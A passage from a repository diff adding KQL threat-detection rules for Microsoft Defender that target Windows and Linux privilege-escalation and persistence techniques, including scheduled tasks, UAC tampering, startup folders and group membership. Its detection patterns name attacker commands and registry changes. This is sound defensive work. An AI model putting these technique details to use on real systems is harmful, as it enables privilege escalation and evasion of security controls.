":\\ProgramData\\OEM\\UpgradeTool\\CareCenter_" and InitiatingProcessFolderPath contains "\\BUnzip\\Setup_msi.exe") or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Camera Station\\SetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Device Manager\\AdmSetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Zemana\\AntiMalware\\AntiMalware.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Dell\\SupportAssist\\pcdrcui.exe"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql new file mode 100644 index 00000000..9543dfc3 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Scheduled Task Name As GUID +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-31 +// Level: medium +// Description: Detects creation of a scheduled task with a GUID like name +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 +// False Positives: +// - Legitimate software naming their tasks as GUIDs + +DeviceProcessEvents +| where (ProcessCommandLine contains "}\"" or ProcessCommandLine contains "}'" or ProcessCommandLine contains "} ") and (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "/TN \"{" or ProcessCommandLine contains "/TN '{" or ProcessCommandLine contains "/TN {") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql new file mode 100644 index 00000000..08ba3dcb --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Scheduled Task Write to System32 Tasks +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-16 +// Level: high +// Description: Detects the creation of tasks from processes executed from suspicious locations +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053 + +DeviceFileEvents +| where (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "C:\\PerfLogs" or InitiatingProcessFolderPath contains "\\Windows\\System32\\config\\systemprofile") and FolderPath contains "\\Windows\\System32\\Tasks" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql b/KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql new file mode 100644 index 00000000..34be5e01 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Schtasks Execution AppData Folder +// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-03-15 +// Level: high +// Description: Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/TR" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\schtasks.exe") and (not((ProcessCommandLine contains "/TN TVInstallRestore" and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "TeamViewer_.exe")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql b/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql new file mode 100644 index 00000000..b0607d5d --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Schtasks Schedule Type With High Privileges +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-31 +// Level: medium +// Description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 +// False Positives: +// - Some installers were seen using this method of creation unfortunately. Filter them in your environment + +DeviceProcessEvents +| where (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql b/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql new file mode 100644 index 00000000..2b840393 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Schtasks Schedule Types +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: high +// Description: Detects scheduled task creations or modification on a suspicious schedule type +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 +// False Positives: +// - Legitimate processes that run at logon. Filter according to your environment + +DeviceProcessEvents +| where ((FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ")) and (not((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql b/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql new file mode 100644 index 00000000..17d1a303 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Screensaver Binary File Creation +// Author: frack113 +// Date: 2021-12-29 +// Level: medium +// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity. +Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.002 + +DeviceFileEvents +| where FolderPath endswith ".scr" and (not(((InitiatingProcessFolderPath endswith "\\Kindle.exe" or InitiatingProcessFolderPath endswith "\\Bin\\ccSvcHst.exe") or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and FolderPath endswith "\\uwfservicingscr.scr")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql b/KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql new file mode 100644 index 00000000..ca67fbfe --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Service DACL Modification Via Set-Service Cmdlet +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-18 +// Level: high +// Description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003 + +DeviceProcessEvents +| where (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and ((ProcessCommandLine contains ";;;IU" or ProcessCommandLine contains ";;;SU" or ProcessCommandLine contains ";;;BA" or ProcessCommandLine contains ";;;SY" or ProcessCommandLine contains ";;;WD") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "D;;")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql b/KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql new file mode 100644 index 00000000..4c4db164 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Shim Database Patching Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-01 +// Level: high +// Description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011 + +DeviceRegistryEvents +| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom*" and (RegistryKey endswith "\\csrss.exe" or RegistryKey endswith "\\dllhost.exe" or RegistryKey endswith "\\explorer.exe" or RegistryKey endswith "\\RuntimeBroker.exe" or RegistryKey endswith "\\services.exe" or RegistryKey endswith "\\sihost.exe" or RegistryKey endswith "\\svchost.exe" or RegistryKey endswith "\\taskhostw.exe" or RegistryKey endswith "\\winlogon.exe" or RegistryKey endswith "\\WmiPrvSe.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql b/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql new file mode 100644 index 00000000..c0cd8516 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql @@ -0,0 +1,15 @@ +// Title: Suspicious Startup Folder Persistence +// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2022-08-10 +// Level: high +// Description: Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors. +These files (.ps1, .vbs, .js, .bat, etc.) are automatically executed when a user logs in, making the Startup folder an attractive target for attackers. +This technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.t1204.002, attack.persistence, attack.t1547.001 +// False Positives: +// - Rare legitimate usage of some of the extensions mentioned in the rule + +DeviceFileEvents +| where FolderPath contains "\\Windows\\Start Menu\\Programs\\Startup\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".hta" or FolderPath endswith ".jar" or FolderPath endswith ".js" or FolderPath endswith ".jse" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psd1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".url" or FolderPath endswith ".vba" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql b/KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql new file mode 100644 index 00000000..8892aae9 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Userinit Child Process +// Author: Florian Roth (Nextron Systems), Samir Bousseaden (idea) +// Date: 2019-06-17 +// Level: medium +// Description: Detects a suspicious child process of userinit +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055 +// False Positives: +// - Administrative scripts + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not(((FolderPath endswith "\\explorer.exe" or ProcessVersionInfoOriginalFileName =~ "explorer.exe" or ProcessCommandLine =~ "C:\\Windows\\Explorer.EXE") or ProcessCommandLine contains "\\netlogon\\" or isnull(FolderPath)))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql b/KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql new file mode 100644 index 00000000..3e913122 --- /dev/null +++ b/KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql @@ -0,0 +1,12 @@ +// Title: Sysinternals PsService Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-16 +// Level: medium +// Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.discovery, attack.persistence, attack.t1543.003 +// False Positives: +// - Legitimate use of PsService by an administrator + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "psservice.exe" or (FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql b/KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql new file mode 100644 index 00000000..6bdb231f --- /dev/null +++ b/KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql @@ -0,0 +1,10 @@ +// Title: Sysinternals PsSuspend Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-23 +// Level: medium +// Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.discovery, attack.persistence, attack.t1543.003 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql new file mode 100644 index 00000000..217ecf3a --- /dev/null +++ b/KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql @@ -0,0 +1,13 @@ +// Title: System Scripts Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where RegistryKey contains "\\Software\\Policies\\Microsoft\\Windows\\System\\Scripts" and (RegistryKey contains "\\Startup" or RegistryKey contains "\\Shutdown" or RegistryKey contains "\\Logon" or RegistryKey contains "\\Logoff") and (not(RegistryValueData =~ "(Empty)")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql b/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql new file mode 100644 index 00000000..898abe2f --- /dev/null +++ b/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql @@ -0,0 +1,13 @@ +// Title: Tasks Folder Evasion +// Author: Sreeman +// Date: 2020-01-13 +// Level: high +// Description: The Tasks folder in system32 and syswow64 are globally writable paths. +Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application +in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.execution, attack.t1574.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql b/KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql new file mode 100644 index 00000000..516509cd --- /dev/null +++ b/KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql @@ -0,0 +1,12 @@ +// Title: Triple Cross eBPF Rootkit Default Persistence +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-05 +// Level: high +// Description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.defense-evasion, attack.t1053.003 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith "ebpfbackdoor" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql b/KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql new file mode 100644 index 00000000..39e864a4 --- /dev/null +++ b/KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql @@ -0,0 +1,10 @@ +// Title: TrustedPath UAC Bypass Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2021-08-27 +// Level: critical +// Description: Detects indicators of a UAC bypass method by mocking directories +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 + +DeviceProcessEvents +| where FolderPath contains "C:\\Windows \\System32\\" or FolderPath contains "C:\\Windows \\SysWOW64\\" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/uac_disabled.kql b/KQL/rules/Privilege Escalation/uac_disabled.kql new file mode 100644 index 00000000..4e5c63ad --- /dev/null +++ b/KQL/rules/Privilege Escalation/uac_disabled.kql @@ -0,0 +1,11 @@ +// Title: UAC Disabled +// Author: frack113 +// Date: 2022-01-05 +// Level: medium +// Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/uac_notification_disabled.kql b/KQL/rules/Privilege Escalation/uac_notification_disabled.kql new file mode 100644 index 00000000..d20cf544 --- /dev/null +++ b/KQL/rules/Privilege Escalation/uac_notification_disabled.kql @@ -0,0 +1,13 @@ +// Title: UAC Notification Disabled +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-05-10 +// Level: medium +// Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. +UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. +When "UACDisableNotify" is set to 1, UAC prompts are suppressed. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\Security Center\\UACDisableNotify" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql b/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql new file mode 100644 index 00000000..ab521f3a --- /dev/null +++ b/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql @@ -0,0 +1,13 @@ +// Title: UAC Secure Desktop Prompt Disabled +// Author: frack113 +// Date: 2024-05-10 +// Level: medium +// Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. +The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. +When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql b/KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql new file mode 100644 index 00000000..d358013c --- /dev/null +++ b/KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql @@ -0,0 +1,12 @@ +// Title: Uncommon Userinit Child Process +// Author: Tom Ueltschi (@c_APT_ure), Tim Shelton +// Date: 2019-01-12 +// Level: high +// Description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1037.001, attack.persistence +// False Positives: +// - Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly. + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not(FolderPath endswith ":\\WINDOWS\\explorer.exe")) and (not(((FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\System32\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\System32\\icast.exe") or isnull(FolderPath) or (ProcessCommandLine contains "netlogon.bat" or ProcessCommandLine contains "UsrLogon.cmd") or (FolderPath endswith ":\\Windows\\System32\\proquota.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\proquota.exe") or ProcessCommandLine =~ "PowerShell.exe"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql b/KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql new file mode 100644 index 00000000..6eceee37 --- /dev/null +++ b/KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql @@ -0,0 +1,12 @@ +// Title: User Added To Highly Privileged Group +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-23 +// Level: high +// Description: Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember". +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1098 +// False Positives: +// - Administrative activity that must be investigated + +DeviceProcessEvents +| where (ProcessCommandLine contains "Group Policy Creator Owners" or ProcessCommandLine contains "Schema Admins") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group ")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql b/KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql new file mode 100644 index 00000000..0af8a856 --- /dev/null +++ b/KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql @@ -0,0 +1,12 @@ +// Title: User Added to Local Administrators Group +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-12 +// Level: medium +// Description: Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember". +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1098 +// False Positives: +// - Administrative activity + +DeviceProcessEvents +| where (ProcessCommandLine contains " administrators " or ProcessCommandLine contains " administrateur") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group ")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql b/KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql new file mode 100644 index 00000000..a7b88820 --- /dev/null +++ b/KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql @@ -0,0 +1,12 @@ +// Title: User Added To Root/Sudoers Group Using Usermod +// Author: TuanLe (GTSC) +// Date: 2022-12-21 +// Level: medium +// Description: Detects usage of the "usermod" binary to add users add users to the root or suoders groups +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence +// False Positives: +// - Legitimate administrator activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "-aG root" or ProcessCommandLine contains "-aG sudoers") and FolderPath endswith "/usermod" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql b/KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql new file mode 100644 index 00000000..14a52d18 --- /dev/null +++ b/KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql @@ -0,0 +1,10 @@ +// Title: Using SettingSyncHost.exe as LOLBin +// Author: Anton Kutepov, oscd.community +// Date: 2020-02-05 +// Level: high +// Description: Detects using SettingSyncHost.exe to run hijacked binary +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.defense-evasion, attack.t1574.008 + +DeviceProcessEvents +| where (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (InitiatingProcessCommandLine contains "cmd.exe /c" and InitiatingProcessCommandLine contains "RoamDiag.cmd" and InitiatingProcessCommandLine contains "-outputpath") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql b/KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql new file mode 100644 index 00000000..c545c7c2 --- /dev/null +++ b/KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql @@ -0,0 +1,10 @@ +// Title: VBScript Payload Stored in Registry +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-05 +// Level: high +// Description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 + +DeviceRegistryEvents +| where ((RegistryValueData contains "vbscript:" or RegistryValueData contains "jscript:" or RegistryValueData contains "mshtml," or RegistryValueData contains "RunHTMLApplication" or RegistryValueData contains "Execute(" or RegistryValueData contains "CreateObject" or RegistryValueData contains "window.close") and RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion") and (not((RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ((RegistryValueData contains "\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll" or RegistryValueData contains "<\\Microsoft.mshtml,fileVersion=" or RegistryValueData contains "_mshtml_dll_" or RegistryValueData contains "<\\Microsoft.mshtml,culture=") and InitiatingProcessFolderPath endswith "\\msiexec.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData*")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql b/KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql new file mode 100644 index 00000000..3b7b7f7f --- /dev/null +++ b/KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql @@ -0,0 +1,10 @@ +// Title: Whoami.EXE Execution From Privileged Process +// Author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov +// Date: 2022-01-28 +// Level: high +// Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.discovery, attack.t1033 + +DeviceProcessEvents +| where (ProcessVersionInfoOriginalFileName =~ "whoami.exe" or FolderPath endswith "\\whoami.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI" or AccountName contains "TrustedInstaller") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql b/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql new file mode 100644 index 00000000..1e929cb5 --- /dev/null +++ b/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql @@ -0,0 +1,13 @@ +// Title: Windows Event Log Access Tampering Via Registry +// Author: X__Junior +// Date: 2025-01-16 +// Level: high +// Description: Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil". + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1547.001, attack.t1112 +// False Positives: +// - Administrative activity, still unlikely + +DeviceRegistryEvents +| where ((RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Services\\EventLog*" and RegistryKey endswith "\\CustomSD") or ((RegistryKey endswith "\\Policies\\Microsoft\\Windows\\EventLog*" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels") and RegistryKey endswith "\\ChannelAccess")) and (RegistryValueData contains "D:(D;" or (RegistryValueData contains "D:(" and RegistryValueData contains ")(D;")) and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\") or InitiatingProcessFolderPath =~ 